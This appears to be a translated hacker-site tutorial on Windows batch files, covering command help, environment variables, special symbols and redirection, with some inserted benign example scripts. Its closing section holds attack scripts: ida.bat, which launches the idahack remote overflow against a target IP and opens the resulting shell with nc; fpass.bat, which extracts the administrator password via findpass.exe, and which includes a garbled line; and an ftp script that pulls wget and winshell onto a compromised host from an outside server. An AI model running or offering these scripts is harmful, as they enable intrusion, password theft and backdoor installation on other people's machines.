Batch (BAT) Strengthening
Hacker security net http://www.hacker81.net
I hope everyone who wants to understand batch files (BAT) will first read the article I published earlier and then this strengthening part. I also think BAT is important, and everyone knows it, so I am posting this chapter; good material improves when it is worked on together. I also hope everyone who has good ideas will learn and strengthen these batch (BAT) skills.
Article structure:
1. Help information for all built-in commands
2. Concept of environment variables
3. Built-in special symbols (pay attention to avoiding them in actual use)
4. Simple batch file concept
5. Annex 1: TMP.TXT
6. Annex 2: sample.bat
############################## 1. Help information for all built-in commands ##############################

cmd /?
if /?
echo /?
goto /?
for /?
shift /?
call /?

Other commonly needed commands:
type /?
find /?
findstr /?
copy /?
______________________________________________________________________
The following writes all of the above help output into one file:

echo ver > TMP.TXT
ver >> TMP.TXT
echo cmd /? >> TMP.TXT
cmd /? >> TMP.TXT
echo rem /? >> TMP.TXT
rem /? >> TMP.TXT
echo if /? >> TMP.TXT
if /? >> TMP.TXT
echo goto /? >> TMP.TXT
goto /? >> TMP.TXT
echo for /? >> TMP.TXT
for /? >> TMP.TXT
echo shift /? >> TMP.TXT
shift /? >> TMP.TXT
echo call /? >> TMP.TXT
call /? >> TMP.TXT
echo type /? >> TMP.TXT
type /? >> TMP.TXT
echo find /? >> TMP.TXT
find /? >> TMP.TXT
echo findstr /? >> TMP.TXT
findstr /? >> TMP.TXT
echo copy /? >> TMP.TXT
copy /? >> TMP.TXT
type TMP.TXT
______________________________________________________
############################## 2. Concept of environment variables ##############################
_____________________________________________________
C:\Program Files>set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=FIRST
ComSpec=C:\WINNT\system32\cmd.exe
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:\WINNT\system32\os2\dll;
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0605
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINNT
TEMP=C:\WINNT\TEMP
TMP=C:\WINNT\TEMP
USERPROFILE=C:\Documents and Settings\Default User
windir=C:\WINNT
_____________________________________________________

Path: the search path for executables. My suggestion is to copy your program into the %WINDIR%\system32\. directory, where it can generally be found. Syntax:

copy mychenxu.exe %windir%\system32\.

Using the dot (.) for the destination is convenient. Environment variables are referenced with percent signs (English mode, half-width characters): %windir% references the variable, and %%WINDIR%% is a second-level (doubled) variable reference. The ones we commonly use are %TEMP% (the temporary file directory), %WINDIR% (the system directory) and %errorlevel% (the exit code).
Send output files to the temporary file directory (%TEMP%); that keeps the current directory easy to clean up.
Parameters containing spaces: you should learn to use double quotes ("") around them, for example when operating on the Program Files folder:

C:\>dir P*
 Directory of C:\

2000-09-02  11:47               2,164 pdos.def
1999-01-03  00:47      <DIR>          Program Files
               1 File(s)          2,164 bytes
               1 Dir(s)   1,505,997,824 bytes free

C:\>cd Pro*
C:\Program Files>

C:\>cd "Program Files"
C:\Program Files>
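The following batch file is an added example, not code from the original article: it puts the points of this section together, quoting a path that contains spaces, showing where PATH resolves a program name (which is why a program copied to %windir%\system32 can be started from anywhere), writing scratch output under %TEMP%, and reading %ERRORLEVEL%. The scratch file name and the list of program names it looks up are chosen for this example.

```batch
@echo off
rem Added example, not from the original article: quoting paths that contain
rem spaces, seeing how PATH resolves a program name, and reading the exit
rem code. The scratch file name is chosen for this example.
setlocal

rem Quote the whole path so "Program Files" is handled as one argument,
rem exactly like the cd "Program Files" example above.
set "TARGET=%ProgramFiles%\Common Files"
if exist "%TARGET%\" (
    echo Directory found:   "%TARGET%"
) else (
    echo Directory missing: "%TARGET%"
)

rem PATH is the search path for executables. %%~$PATH:p expands to the
rem full path where the name in %%p is first found, or to nothing at all.
rem This is why a program copied into %windir%\system32 runs from anywhere.
for %%p in (find.exe notepad.exe no_such_tool.exe) do (
    if "%%~$PATH:p"=="" (
        echo %%p: not found on PATH
    ) else (
        echo %%p: %%~$PATH:p
    )
)

rem Put scratch output under %TEMP% rather than the current directory.
set "OUT=%TEMP%\envcheck_%RANDOM%.txt"
dir /b "%TARGET%" > "%OUT%" 2>nul

rem %ERRORLEVEL% holds the exit code of the last command, 0 on success.
if errorlevel 1 (
    echo dir failed, exit code %ERRORLEVEL%
) else (
    echo listing written to "%OUT%"
)

rem Two percent signs produce one literal percent sign on screen.
echo The variable %%TEMP%% currently expands to %TEMP%

del "%OUT%" 2>nul
endlocal
```

Save it as envcheck.bat and run it from any directory; the PATH lookup lines are the ones to watch when a tool "cannot be found" from a batch file.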
############################## 3. Built-in special symbols (pay attention to avoiding them in actual use) ##############################

Microsoft reserves the following names and characters, which cannot be used in the name of a file you create: CON, NUL, AUX, and the characters \ / | & ^ > < *

From the cmd /? help text: you can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples: (Gist: either use ^ as the escape character, or use double quotes "".)

To create the variable value new&name, type:
set varname=new^&name

To create the variable value "new&name", type:
set varname="new&name"

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments. For example, an argument containing a space is quoted:

find "Pacific Rim"

and the IF example from the same help text reads:

if exist filename. (del filename.) else echo filename. missing
>   creates (overwrites) a file
>>  appends to a file

@   prefix character: the line itself is not displayed in CMD. You can use echo off to turn off the display for every line.

^   escape character for the special symbols (> < &). Of the two lines below, the first only displays "123456 > AAA" on screen; the second writes to the file BBB:
echo 123456 ^> AAA
echo 1231231 > BBB

( ) groups commands, e.g. (echo aa & echo bb); space is likewise the default separator.

&   usage: command1 & command2 [& command3 ...]
    All commands run in sequence, regardless of whether the previous one succeeded:
    dir c:\*.exe & dir d:\*.exe & dir e:\*.exe

&&  usage: command1 && command2 [&& command3 ...]
    When an error is encountered, the following commands are not executed; if there is no error, all commands are executed.

||  usage: command1 || command2 [|| command3 ...]
    When a command succeeds, the following commands are not executed; if no command succeeds, all commands are executed.

Common syntax forms:
IF [NOT] ERRORLEVEL number command para1 para2
IF [NOT] string1==string2 command para1 para2
IF [NOT] EXIST filename command para1 para2

IF exist filename command para1 para2
IF not exist filename command para1 para2
IF "%1"=="" goto end
IF "%1"=="net" goto net
IF not "%2"=="net" goto other
IF errorlevel 1 command para1 para2
IF not errorlevel 1 command para1 para2

FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i
FOR /F "eol=; tokens=2,3* delims=, " %i IN (myfile.txt) DO echo %i %j %k

The token variables are assigned in alphabetical order: i j k l m n o p q.
eol=c    - a single end-of-line comment character
skip=n   - the number of lines to ignore at the start of the file
delims=xxx - specifies the delimiter set; this replaces the default delimiter set of space and tab.
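The following is an added example, not code from the original article: it exercises the operators and the IF / FOR forms listed above on a small constructed log of login results, counting failed administrator logins and warning when they reach a threshold. The log file name, the log lines and the threshold argument are all made up for this example.

```batch
@echo off
rem Added example, not from the original article: the operators and the
rem IF / FOR forms described above, applied to a small constructed log.
rem The file name and the log lines are made up for this example.
setlocal
set "LOG=%TEMP%\logins_example.txt"

rem Threshold of failed administrator logins that triggers a warning.
rem Same test as the article's IF "%1"=="" check: default when no argument.
if "%1"=="" (set THRESHOLD=2) else (set THRESHOLD=%1)

rem Build the sample input. > creates the file, >> appends to it, and ^
rem escapes the pipe so it is written literally instead of starting a pipe.
>  "%LOG%" echo # date,user,result
>> "%LOG%" echo 2001-08-01,administrator,failed
>> "%LOG%" echo 2001-08-01,chenxu,ok
>> "%LOG%" echo 2001-08-02,administrator,failed
>> "%LOG%" echo 2001-08-02,guest,failed ^| account locked

rem && runs the right side only if the left succeeded (exit code 0);
rem || runs the right side only if the left failed.
find "failed" "%LOG%" >nul && echo Log contains failed logins || echo Log contains no failed logins

rem FOR /F: eol=# skips the header line, delims=, splits on commas, and
rem tokens=2,3 puts the user in %%u and the result in %%v (the next letter).
rem Inside a batch file the loop variable needs two percent signs.
set /a ADMINFAIL=0
for /f "usebackq eol=# tokens=2,3 delims=," %%u in ("%LOG%") do (
    if /i "%%u"=="administrator" if /i "%%v"=="failed" set /a ADMINFAIL+=1
)

rem IF [NOT] ERRORLEVEL is for exit codes; for numbers use GEQ / LSS.
rem Parentheses inside a block must be escaped with ^ or they close it.
if %ADMINFAIL% GEQ %THRESHOLD% (
    echo WARNING: %ADMINFAIL% failed administrator logins ^(threshold %THRESHOLD%^)
) else (
    echo OK: %ADMINFAIL% failed administrator logins
)

rem FOR /L counts start,step,end; here it just numbers a retry message.
for /l %%i in (1,1,3) do echo retry %%i of 3

del "%LOG%" 2>nul
endlocal
```

With the constructed log the count is 2, so running it without an argument prints the WARNING line, while logincheck.bat 3 prints the OK line. The usebackq option is there so the quoted %TEMP% path still works when it contains spaces.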
############################## 4. Simple batch file concept ##############################
echo this is test > a.txt
type a.txt
echo this is test 1111 >> a.txt
type a.txt
echo this is test 22222 > a.txt
type a.txt

The second echo appends to a.txt; the third echo clears a.txt and recreates it.
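The batch file below is an added example, not code from the original article: it applies the > and >> redirection just shown, together with @ prefixes and IF EXIST checks, to keep a timestamped log of connections involving the RDP port (3389), the same connections the article later lists with netstat -n piped into find "3389". It matches ":3389" rather than "3389" so that only the port field is matched. The log file name is chosen for this example.

```batch
@echo off
rem Added example, not from the original article: a small monitoring batch
rem that keeps a log of connections involving the RDP port (3389), using
rem the redirection operators shown above. The log file name is made up.
setlocal
set "LOG=%TEMP%\rdp_connections.log"

rem Check that the tools we rely on exist before using them.
if not exist "%windir%\system32\find.exe" (
    echo error: find.exe not found
    goto end
)
if not exist "%windir%\system32\netstat.exe" (
    echo error: netstat.exe not found
    goto end
)

rem >> appends, so every run (for example from a scheduled task) adds a
rem timestamped block instead of overwriting the previous one.
>> "%LOG%" echo ==== %DATE% %TIME% ====

rem ":3389" matches the port field of each netstat line. The exit code of
rem a pipeline is that of its last command, so find's result is tested:
rem find returns 1 when nothing matched.
netstat -n | find ":3389" >> "%LOG%"
if errorlevel 1 (
    echo No connections involving port 3389 at %TIME%
) else (
    echo Connections involving port 3389 appended to "%LOG%"
    type "%LOG%"
)

:end
endlocal
```

Run it by hand or from a scheduled task; because the log is only ever appended to, the history of who was connected to 3389 survives across runs until you delete the file.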
netstat -n | find "3389"

This lists the IP addresses of all users connected to port 3389.
________________ test.bat ___________________________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
rem   comment statement, not executed; the line itself is displayed
@rem  comment statement, not executed; the line itself is not displayed
@if exist %windir%\system32\find.exe (echo find find.exe !!!) else (echo error: not find find.exe)
@if exist %windir%\system32\fina.exe (echo find fina.exe !!!) else (echo error: not find fina.exe)
____________________________________________________________________________

Let's take a specific one as an example, the idahack IDA remote overflow program; it should be very simple.
___________________ ida.bat _______________________
@rem ver 1.0
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"
@if "%1"=="" goto usage
@if NOT "%2"=="" goto sp2

:start
@echo now start ...
@ping %1
@echo chinese win2k: 1  sp1: 2  sp2: 3
idahack.exe %1 80 1 99 > %temp%\_tmp
@echo "prog exit code [%errorlevel%] idahack.exe"
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@echo "prog exit code [%errorlevel%] find [good luck]"
@if NOT errorlevel 1 nc.exe %1 99
@goto end

:sp2
@idahack.exe %1 80 %2 99 > %temp%\_tmp
@type %temp%\_tmp
@find "good luck" %temp%\_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto end

:usage
@echo example: ida.bat ip
@echo example: ida.bat ip (2, 3)

:end
_____________________ ida.bat __END _________________________________

Here we come back to the second file, which gets the administrator's password. Most people say it does not work; actually it is because they did not enter the correct information.
___________________________ fpass.bat ____________________________________________
@rem ver 1.0
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: DONT FIND FINDPASS.EXE"
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: DONT FIND PULIST.EXE"
@echo ____________________________________________
@%%% 1%%%% 1 1 1 1 1 1%%%%% 1% 1 1 1 2 1 1 1 1 %] Findpass.exe "
@type %temp%\_findpass.txt
@echo ________________________________________________________________________________★★★★★★
@ipconfig /all >> %temp%\_findpass.txt
@goto end
:usage
@pulist.exe > %temp%\_pass.txt
@findstr.exe /i "winlogon explorer internat" %temp%\_pass.txt
@echo "example: fpass.bat %1 %2 %3 %4 !!!"
@echo "usage: findpass.exe DomainName Username Pid-of-Winlogon"

:end
@echo "fpass.bat %COMPUTERNAME% %USERNAME% administrator"
@echo "! fpass.bat end [%errorlevel%]"
_________________ fpass.bat ___ END ___________________________________________

You have already logged into a remote host via telnet; how do you upload files? (WIN) Enter the following in turn. Of course, you can also copy it and paste it (Ctrl-V) over. Then wait!!
echo open 210.64.x.4 3396 > w
echo read >> w
echo read >> w
echo cd winnt >> w
echo binary >> w
echo pwd >> w
echo get wget.exe >> w
echo get winshell.exe >> w
echo get any.exe >> w
echo quit >> w
ftp -s:w